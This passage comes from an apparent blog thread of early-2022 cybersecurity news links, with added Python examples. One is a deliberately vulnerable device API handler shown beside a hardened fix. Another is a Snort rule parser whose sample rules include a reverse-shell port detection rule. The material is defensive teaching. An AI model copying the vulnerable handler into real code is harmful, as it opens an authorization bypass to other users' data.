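    rec = DEVICE_RECORDS.get(device_id)
    if rec is None:
        raise ApiError(404, "not found")
    return rec


def get_device_hardened(device_id: str, token: Optional[str]) -> Dict:
    """Authenticate the session, then authorise the specific object against it."""
    account = SESSIONS.get(token or "")
    if account is None:
        raise ApiError(401, "authentication required")
    rec = DEVICE_RECORDS.get(device_id)
    # The ownership check is what makes the direct reference safe. Unknown ids and
    # ids owned by someone else get the identical 404 so ids cannot be enumerated.
    if rec is None or rec["owner"] != account:
        raise ApiError(404, "not found")
    return rec


def call(handler, device_id: str, token: Optional[str]) -> Tuple[int, Optional[Dict]]:
    """Drive a handler the way an HTTP layer would: (status, body)."""
    try:
        return 200, handler(device_id, token)
    except ApiError as err:
        return err.status, None


if __name__ == "__main__":
    # An attacker with no session at all reads acct-42's device through the vulnerable path.
    print(call(get_device_vulnerable, "dev-1002", None))
    # The hardened path refuses both the unauthenticated and the cross-account request.
    print(call(get_device_hardened, "dev-1002", None))
    print(call(get_device_hardened, "dev-1002", "tok-17"))
    print(call(get_device_hardened, "dev-1002", "tok-42"))
```

When testing a real API for this class of bug, the check is the same as the last three calls: replay a valid request with another account's object id, with a second low-privilege account's token, and with no token, and confirm all three are refused.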
Tomi Engdahl says:
Ransomware victims are paying up. But then the gangs are coming back for more https://www.zdnet.com/article/ransomware-victims-are-paying-up-but-the-crooks-are-coming-back-for-more/
Many organisations that fall prey to ransomware attacks end up paying a ransom multiple times as cyber criminals exploit weaknesses in cybersecurity to squeeze their victims for as much cash as they can.
Report at
https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-state-of-the-phish-2022.pdf
Tomi Engdahl says:
83% of employees continue accessing old employer’s accounts https://www.helpnetsecurity.com/2022/02/21/employees-maintaining-accounts-access/
In a recent study, Beyond Identity gathered responses from former employees across the United States, the United Kingdom, and Ireland and found 83% of employees admitted to maintaining continued access to accounts from a previous employer.
Tomi Engdahl says:
Chinese Experts Uncover Details of Equation Group’s Bvp47 Covert Hacking Tool https://thehackernews.com/2022/02/chinese-experts-uncover-details-of.html
Researchers from China’s Pangu Lab have disclosed details of a “top-tier” backdoor put to use by the Equation Group, an advanced persistent threat (APT) with alleged ties to the cyber-warfare intelligence-gathering unit of the U.S. National Security Agency (NSA).
Dubbed “Bvp47” owing to numerous references to the string “Bvp” and the numerical value “0x47” used in the encryption algorithm, the backdoor was extracted from Linux systems “during an in-depth forensic investigation of a host in a key domestic department” in 2013.
The defense research group codenamed the attacks involving the deployment of Bvp47 “Operation Telescreen,” with the implant featuring an “advanced covert channel behavior based on TCP SYN packets, code obfuscation, system hiding, and self-destruction design.”
Bvp47 is said to have been used on more than 287 targets in the academia, economic development, military, science, and telecom sectors located in 45 countries, mainly in China, Korea, Japan, Germany, Spain, India, and Mexico, all the while going largely undetected for over a decade.
The Bvp47 – a Top-tier Backdoor of US NSA Equation Group
https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/
In a certain month of 2013, during an in-depth forensic investigation of a host in a key domestic department, researchers from the Pangu Lab extracted a set of advanced backdoors on the Linux platform, which used advanced covert channel behavior based on TCP SYN packets, code obfuscation, system hiding, and self-destruction design. Unable to fully decrypt it, the researchers further found that this backdoor needs a check code bound to the host to run normally. The researchers then cracked the check code and successfully ran the backdoor. Judging from some behavioral functions, this is a top-tier APT backdoor, but further investigation requires the attacker’s asymmetric encrypted private key to activate the remote control function. Based on the most common string “Bvp” in the sample and the numerical value 0x47 used in the encryption algorithm, the team named the corresponding malicious code “Bvp47” at the time.
In 2016 and 2017, “The Shadow Brokers” published two batches of hacking files claimed to be used by “The Equation Group”. In these hacking files, researchers from Pangu Lab found the private key that can be used to remotely trigger the backdoor Bvp47. Therefore, it can be concluded that Bvp47 is a hacker tool belonging to “The Equation Group”.
Through further research, the researchers found that the multiple procedures and attack operation manuals disclosed by “The Shadow Broker” are completely consistent with the only identifier used in the NSA network attack platform operation manual [References 3 and 4] exposed by CIA analyst Snowden in the “Prism” incident in 2013.
Tomi Engdahl says:
Log4j Remediation Took Weeks or More for Over 50% of Organizations https://www.darkreading.com/attacks-breaches/log4j-remediation-took-weeks-or-more-for-more-than-50-of-organizations
(ISC)² survey also found that half of cybersecurity teams worldwide worked on fixing Log4j issues on weekends and during time off.
Tomi Engdahl says:
The Rise and Fall of log4shell
https://isc.sans.edu/diary/rss/28372
Over time, attackers and researchers lost interest in log4j. We did see the peak of activity in the latter part of December, with December 28th sticking out.
Tomi Engdahl says:
Inside the Lab Where Intel Tries to Hack Its Own Chips https://www.wired.com/story/intel-lab-istare-hack-chips/
That’s why five years ago Intel launched a dedicated hardware hacking group known as Intel Security Threat Analysis and Reverse Engineering [...]. iSTARE researchers crack open computer cases, physically solder new circuits on a motherboard, deliver strategic electromagnetic pulses to alter behavior as electrons flow through a processor, and measure whether physical traits like heat emissions or vibrations incidentally leak information about what a device is doing.
Tomi Engdahl says:
Recent Cyberattacks Target Open-source Web Servers https://www.trendmicro.com/en_us/research/22/b/recent-cyberattacks-open-source-web-servers.html
Malicious actors take advantage of people’s reliance on web servers to perform attacks like remote code execution, access control bypass, denial of service, or even cyberjacking the victim servers to mine cryptocurrencies.
Tomi Engdahl says:
Access Brokers: Who Are the Targets, and What Are They Worth?
https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/
Access brokers have advertised organizations from more than 30 different sectors, demonstrating an eclectic range of targets. Among these, the academic, government and technology sectors were the most frequently advertised, accounting for a combined 49% of the total advertisements. [...] access to the academic sector was, on average, priced at $3,827 USD. In comparison, the government sector which was the second most advertised attracted an average asking price of $6,151 USD. Geographically, advertisements for access to U.S.-based entities far surpass those for all other countries, claiming 55% of the total. Organizations based in Brazil and the UK secure second and third spots with 8% and 7%, respectively.
Tomi Engdahl says:
Shadowserver Starts Conducting Daily Scans to Help Secure ICS https://www.securityweek.com/shadowserver-starts-conducting-daily-scans-help-secure-ics
The Shadowserver Foundation this week announced that it has started conducting daily internet scans in an effort to identify exposed industrial control systems (ICS) and help organizations reduce their exposure to attacks.
Tomi Engdahl says:
Dragos 2021 Industrial Cybersecurity Year In Review Summary https://www.dragos.com/blog/dragos-2021-industrial-cybersecurity-year-in-review-summary/
Ransomware became the number one attack vector in the industrial sector. Dragos assessed that manufacturing accounted for 65% of all ransomware attacks. Two ransomware groups, Conti and Lockbit 2.0, caused 51 percent of attacks, with 70% of their malicious activity targeting manufacturing. [Report at https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf?hsLang=en]
Tomi Engdahl says:
New laws to strengthen UK cybersecurity provisions https://www.pandasecurity.com/en/mediacenter/security/new-laws-uk-cybersecurity/
Under the new laws, the government is proposing to extend these obligations to providers of outsourced IT services too. This means that any company providing IT services including cloud software and storage will need to prove their cyber defence capabilities adhere to the NIS regulations.
Tomi Engdahl says:
Microsoft Security delivers new multicloud capabilities https://www.microsoft.com/security/blog/2022/02/23/microsoft-security-delivers-new-multicloud-capabilities/
Today, we’re taking another step in Microsoft’s journey to protect our customers across diverse cloud systems by extending the native capabilities of Microsoft Defender for Cloud to the Google Cloud Platform (GCP).
Tomi Engdahl says:
Meet The Secretive Surveillance Wizards Helping The FBI And ICE Wiretap Facebook And Google Users https://www.forbes.com/sites/thomasbrewster/2022/02/23/meet-the-secretive-surveillance-wizards-helping-the-fbi-and-ice-wiretap-facebook-and-google-users/
Sometimes it takes a spy to get transparency from a surveillance company. Jack Poulson, founder of technology watchdog Tech Inquiry, went incognito at the National Sheriffs’ Association’s winter conference in Washington. He recorded a longtime PenLink employee showing off what the company could do for law enforcement and discussing the scale of its operations. Not only does the recording lift the lid on how deeply involved PenLink is in wiretapping operations across the U.S., it also reveals in granular detail just how tech providers such as Apple, Facebook and Google provide information to police when they’re confronted with a valid warrant or subpoena.
Tomi Engdahl says:
HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/
On February 23rd, the threat intelligence community began observing a new wiper malware sample circulating in Ukrainian organizations. Our analysis shows a signed driver is being used to deploy a wiper that targets Windows devices, manipulating the MBR resulting in subsequent boot failure. This blog includes the technical details of the wiper, dubbed HermeticWiper, and includes IOCs to allow organizations to stay protected from this attack. This sample is actively being used against Ukrainian organizations, and this blog will be updated as more information becomes available. Also:
https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia
https://www.bleepingcomputer.com/news/security/new-data-wiping-malware-used-in-destructive-attacks-on-ukraine/
Tomi Engdahl says:
Manufacturing was the top industry targeted by ransomware last year https://www.tripwire.com/state-of-security/security-data-protection/manufacturing-was-the-top-industry-targeted-by-ransomware-last-year/
Global supply chains are bearing the brunt of ransomware attacks, according to a new report that finds manufacturing was the most targeted industry during 2021. Knocking financial services and insurance off the top of the heap after a long reign, the manufacturing industry was found by IBM to be the most attacked sector, accounting for 23% of reports of ransomware. That’s one of the headlines from IBM’s X-Force Threat Intelligence Index, which claims that more ransomware attacks were experienced by manufacturers than any other industry, and that the ripple effect of disruption caused their downstream supply chains to pressure them into paying the ransom. Also:
https://securityintelligence.com/posts/2022-x-force-threat-intelligence-index-ransomware-resilience-tops-findings/
Tomi Engdahl says:
Mitigating kernel risks on 32-bit ARM
https://security.googleblog.com/2022/02/mitigating-kernel-risks-on-32-bit-arm.html
Linux kernel support for the 32-bit ARM architecture was contributed in the late 90s, when there was little corporate involvement in Linux development, and most contributors were students or hobbyists, tinkering with development boards, often without much in the way of documentation. Now 20+ years later, 32-bit ARM’s maintainer has downgraded its support level to ‘odd fixes,’ while remaining active as a kernel contributor. This is a common pattern for aging and obsolete architectures: corporate funding for Linux kernel development has tremendously increased the pace of development, but only for architectures with a high return on investment.
Tomi Engdahl says:
Construction businesses: understanding the cyber threat https://www.ncsc.gov.uk/blog-post/construction-businesses-understanding-the-cyber-threat
Like many other sectors that are embracing new technologies and adopting digital ways of working, the construction industry continues to be impacted by cyber crime. Construction businesses are seen by cyber criminals as an easy target. Many have high cash-flows and make extensive use of sub-contractors and suppliers, often involving large numbers of high value payments. And although construction businesses don’t store the same kind of financial information that (for example) banks do, they still process (and have access to) valuable data.
Tomi Engdahl says:
The UK government has announced plans for new laws designed to strengthen cyber security provisions across the country. Under the new laws, British businesses will have greater legal responsibility for protecting their IT systems and data https://www.pandasecurity.com/en/mediacenter/security/new-laws-uk-cybersecurity/
Under the new laws, the government is proposing to extend these obligations to providers of outsourced IT services too. This means that any company providing IT services including cloud software and storage will need to prove their cyber defence capabilities adhere to the NIS regulations.
Tomi Engdahl says:
Financial cyberthreats in 2021
https://securelist.com/financial-cyberthreats-in-2021/105898/
The year 2021 was eventful in terms of digital threats for organizations and individuals, and financial institutions were no exception. Throughout the past year, we have seen cybercriminals continue to actively target our users with tools and techniques that emerged due to the pandemic. Imperfections in the transition to remote/hybrid work continue to pose a huge threat to businesses. On top of that, economic issues caused by the pandemic have only aggravated the problem.
Tomi Engdahl says:
Tackling Security Challenges in 5G Networks https://www.enisa.europa.eu/news/enisa-news/tackling-security-challenges-in-5g-networks
The EU Agency for Cybersecurity (ENISA) proposes good practices for the secure deployment of Network Function Virtualisation (NFV) in 5G networks. Network Function Virtualisation is a new technology in 5G networks, which offers benefits for telecom operators in terms of flexibility, scalability, costs, and network management. However, this technology also introduces new security challenges.
Tomi Engdahl says:
Please Sign on the Dotted Line: DocuSign Phishing Attack https://www.armorblox.com/blog/blox-tales-please-sign-on-the-dotted-line-docusign-phishing-attack/
Electronic signatures have become the norm to conduct business transactions. From legal contracts, invoices, purchase orders and other legal documents, e-signature can be done without making an office visit, meeting a sales person or without the need of courier services like FedEx and UPS. The problem with electronic signatures?
They provide one more way for cybercriminals to attempt to steal identity and organizations financial and sensitive data. Malicious actors have used this process to launch phishing attacks masquerading as valid emails soliciting digital signatures.
Tomi Engdahl says:
Did we learn nothing from Y2K? Why are some coders still stuck on two digit numbers?
https://nakedsecurity.sophos.com/2022/02/25/did-we-learn-nothing-from-y2k-why-are-some-coders-still-stuck-on-two-digit-numbers/
If you use Mozilla Firefox or any Chromium-based browser, notably Google Chrome or Microsoft Edge, you’ll know that the version numbers of these products are currently at 97 and 98 respectively. And if you’ve ever looked at your browser’s User-Agent string, you’ll know that these version numbers are, by default, transmitted to every web page you visit, as a kind of handy hint to say, “Look who’s coming to dinner.”
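The Y2K comparison is exact: server-side code that assumes the browser major version is two digits wide reads Chrome 100 as Chrome 10 and Firefox 100 as Firefox 10, and then refuses the "outdated" browser. The script below is an added example, not code from the Sophos article; the User-Agent strings are constructed, and the naive parser is written to show the bug, next to a parser that takes however many digits follow the product token.

```python
"""Two-digit version parsing of User-Agent strings: the bug and the fix side by side.

Added example. The User-Agent strings are constructed, not captured traffic.
"""
import re
from typing import Callable, Optional

CHROME_98 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36")
CHROME_100 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36")
FIREFOX_100 = "Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0"


def naive_major(ua: str, product: str = "Chrome") -> Optional[int]:
    """The two-digit assumption: take exactly two characters after 'Product/'.
    Correct for versions 10..99, silently reads 100 as 10."""
    marker = product + "/"
    start = ua.find(marker)
    if start < 0:
        return None
    start += len(marker)
    return int(ua[start:start + 2])


def robust_major(ua: str, product: str = "Chrome") -> Optional[int]:
    """Read every digit up to the next '.', whitespace or end of string."""
    match = re.search(re.escape(product) + r"/(\d+)(?:\.|\s|$)", ua)
    return int(match.group(1)) if match else None


def supported(ua: str, product: str, minimum: int,
              parser: Callable[[str, str], Optional[int]]) -> bool:
    """The gate a site puts in front of a 'your browser is too old' page."""
    major = parser(ua, product)
    return major is not None and major >= minimum


if __name__ == "__main__":
    for label, ua, product in (("Chrome 98", CHROME_98, "Chrome"),
                               ("Chrome 100", CHROME_100, "Chrome"),
                               ("Firefox 100", FIREFOX_100, "Firefox")):
        print(f"{label:12} naive={naive_major(ua, product)!s:>4} "
              f"robust={robust_major(ua, product)!s:>4} "
              f"allowed(naive)={supported(ua, product, 90, naive_major)} "
              f"allowed(robust)={supported(ua, product, 90, robust_major)}")
```

Both Chrome and Firefox shipped flags to send a fake "99.x" major ahead of the real 100 release so site owners could test; a parser that survives the robust form above is also what you want for any numeric field that will eventually grow a digit (build numbers, record counts, years).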
Tomi Engdahl says:
Jester Stealer: An Emerging Info Stealer https://blog.cyble.com/2022/02/24/jester-stealer-an-emerging-info-stealer/
Cyble Research Labs have been actively monitoring various stealers, and recently we came across a malware sample which turned out to be Jester Stealer. Jester Stealer is an Info Stealer, which steals your sensitive information such as login credentials, cookies, credit card details, etc., and sends the exfiltrated data to Threat Actor (TA).
Jester Stealer surfaced on cybercrime forums in July 2021.
Tomi Engdahl says:
Cybersecurity burnout is real. And it’s going to be a problem for all of us https://www.zdnet.com/article/cybersecurity-burnout-is-real-and-its-going-to-be-a-problem-for-all-of-us/
With the number of data breaches in 2021 soaring past that of 2020, there is even more pressure on security teams to keep businesses secure in 2022. But at a time when strength and resilience have never been more important, burnout, low staff morale and high employee turnover could put businesses on the back foot when attempting to manage the mounting cybersecurity threat. Employers already face something of a dilemma when it comes to cybersecurity in 2022. Not only is the number of attempted cyberattacks escalating worldwide, but employers face the added pressure of a tightening hiring market and record levels of resignations that are also affecting the tech industry.
Tomi Engdahl says:
The Hunt for the Lost Soul: Unraveling the Evolution of the SoulSearcher Malware https://www.fortinet.com/blog/threat-research/unraveling-the-evolution-of-the-soul-searcher-malware
A threat report published by Symantec in October 2021 recently caught our attention. It discusses an unknown threat actor conducting an espionage campaign in Southeast Asia using a new custom malware arsenal. What piqued our curiosity most was the mention of a DLL payload loaded from the registry that had yet to be discovered. The reason the module was difficult to find became apparent after analyzing its loader. The module is stored as a compressed blob with a custom header in the registry. It is never written to disk, rendering it unlikely to appear in datasets like VirusTotal.
Tomi Engdahl says:
Using Snort IDS Rules with NetWitness PacketDecoder https://isc.sans.edu/forums/diary/Using+Snort+IDS+Rules+with+NetWitness+PacketDecoder/28382/
NetWitness has the ability to load Snort rules on its PacketDecoder to detect and alert on suspicious activity. Since it is practical to be able to see the signature makeup and what it is looking for, I created a script that parses the Snort rule tarball into a single file (list.rules), which can be pushed and loaded in all the PacketDecoders. The script also parses each signature into a single HTML file that can be queried to review the signature to understand what the alert is matching.
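The diary's script is not reproduced on this page, so here is an added, independent example of the parsing step it describes: turning a Snort rules file into a list of structured records (header fields, msg, sid, rev and the remaining options) that can be queried or rendered. It is not the ISC author's code and makes no NetWitness calls; the rules it parses are constructed. The two details that trip up quick regex-based parsers are handled: a `;` inside a quoted option value does not end the option, and a trailing backslash continues the rule on the next line.

```python
"""Parse Snort rules into structured records for review or indexing.

Added example with constructed rules; not the script from the ISC diary.
"""
import re
from typing import Dict, Iterator, List, Optional

# Constructed sample rules (not from any vendor ruleset).
SAMPLE_RULES = r"""
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"Example SMB probe"; flow:to_server,established; content:"|FF|SMB"; sid:1000001; rev:2; classtype:attempted-recon;)
# alert udp any any -> any 53 (msg:"disabled rule"; sid:1000002; rev:1;)
alert tcp any any -> any any (msg:"semicolon; inside quotes"; content:"a|3B|b"; sid:1000003; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET 4444 (msg:"Reverse shell port"; \
    flow:to_server; sid:1000004; rev:3;)
"""

HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*$"
)


def _logical_lines(text: str) -> Iterator[str]:
    """Join physical lines that end in a backslash (Snort's continuation marker)."""
    buf = ""
    for raw in text.splitlines():
        stripped = raw.rstrip()
        if stripped.endswith("\\"):
            buf += stripped[:-1]
            continue
        yield buf + raw
        buf = ""
    if buf:
        yield buf


def _split_options(body: str) -> List[str]:
    """Split 'k:v; k:v;' on ';' except inside double quotes or after a backslash."""
    parts, cur, in_quote, escaped = [], [], False, False
    for ch in body:
        if escaped:
            cur.append(ch)
            escaped = False
            continue
        if ch == "\\":
            cur.append(ch)
            escaped = True
            continue
        if ch == '"':
            in_quote = not in_quote
        if ch == ";" and not in_quote:
            parts.append("".join(cur).strip())
            cur = []
            continue
        cur.append(ch)
    parts.append("".join(cur).strip())
    return [p for p in parts if p]


def parse_rule(line: str) -> Optional[Dict]:
    """Return a record for one rule, or None for blank and commented lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    open_idx, close_idx = line.find("("), line.rfind(")")
    if open_idx < 0 or close_idx < open_idx:
        raise ValueError(f"no option block: {line!r}")
    header = HEADER_RE.match(line[:open_idx])
    if header is None:
        raise ValueError(f"unparseable header: {line!r}")
    rule: Dict = header.groupdict()
    options: Dict[str, List[str]] = {}
    for opt in _split_options(line[open_idx + 1:close_idx]):
        key, _, value = opt.partition(":")
        options.setdefault(key.strip(), []).append(value.strip())
    if "sid" not in options:
        raise ValueError(f"rule without sid: {line!r}")
    rule["msg"] = options.get("msg", ['""'])[0].strip('"')
    rule["sid"] = int(options["sid"][0])
    rule["rev"] = int(options.get("rev", ["0"])[0])
    rule["options"] = options
    return rule


def parse_rules(text: str) -> List[Dict]:
    return [r for r in (parse_rule(l) for l in _logical_lines(text)) if r is not None]


def summary_line(rule: Dict) -> str:
    """One-line index entry of the kind a review page would list per signature."""
    return (f"{rule['sid']}:{rule['rev']} {rule['action']} {rule['proto']} "
            f"{rule['src']}:{rule['sport']} {rule['dir']} {rule['dst']}:{rule['dport']}  "
            f"{rule['msg']}")


if __name__ == "__main__":
    for parsed in parse_rules(SAMPLE_RULES):
        print(summary_line(parsed))
```

The `options` map keeps every option verbatim (quotes included) and in order, so the same records can be rendered into the single reviewable listing the diary mentions, or written back out unchanged once the rules you want are filtered by sid, classtype or content.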
Tomi Engdahl says:
Conti ransomware attack on Irish healthcare system may cost over $100 million https://www.zdnet.com/article/cost-of-conti-ransomware-attack-on-irish-healthcare-system-may-reach-over-100-million/
An Irish news outlet is reporting that the country’s healthcare system will have to spend more than $48 million recovering from a widespread ransomware attack by the Conti group that took place last year. In a letter obtained by RTÉ, Health Service Executive interim chief information officer Fran Thompson said the costs associated with the ransomware attack include $14.2 million for ICT infrastructure, $6.1 million to pay for outside cybersecurity assistance, $17.1 million for vendor support and $9.4 million for Office 365.
Tomi Engdahl says:
The Urgency To Cyber-Secure Space Assets https://www.forbes.com/sites/chuckbrooks/2022/02/27/the-urgency-to-cyber-secure-space-assets/
Our reliance on space, and especially satellites, for communications, security, intelligence, and commerce has exponentially grown with digital transformation. Unfortunately, so have the risks, as a result, the need to prioritize cybersecurity around space assets is urgent.
Last May, the Cybersecurity and Infrastructure Security Agency (CISA) announced the formation of a Space Systems Critical Infrastructure Working Group. The group is composed of government and industry members that operates under the Critical Infrastructure Partnership Advisory Council (CIPAC) framework, bringing together space system critical infrastructure stakeholders.
Tomi Engdahl says:
2022 may be the year cybercrime returns its focus to consumers https://www.bleepingcomputer.com/news/security/2022-may-be-the-year-cybercrime-returns-its-focus-to-consumers/
Threat analysts expect 2022 to be the tipping point for a shift in the focus of hackers from large companies back to consumers. This prediction is the result of several factors that make consumers a lot more lucrative to threat actors today than in previous years.
ReasonLabs has compiled a detailed report on the status of consumer-level cybersecurity and what trends are most likely to emerge this year.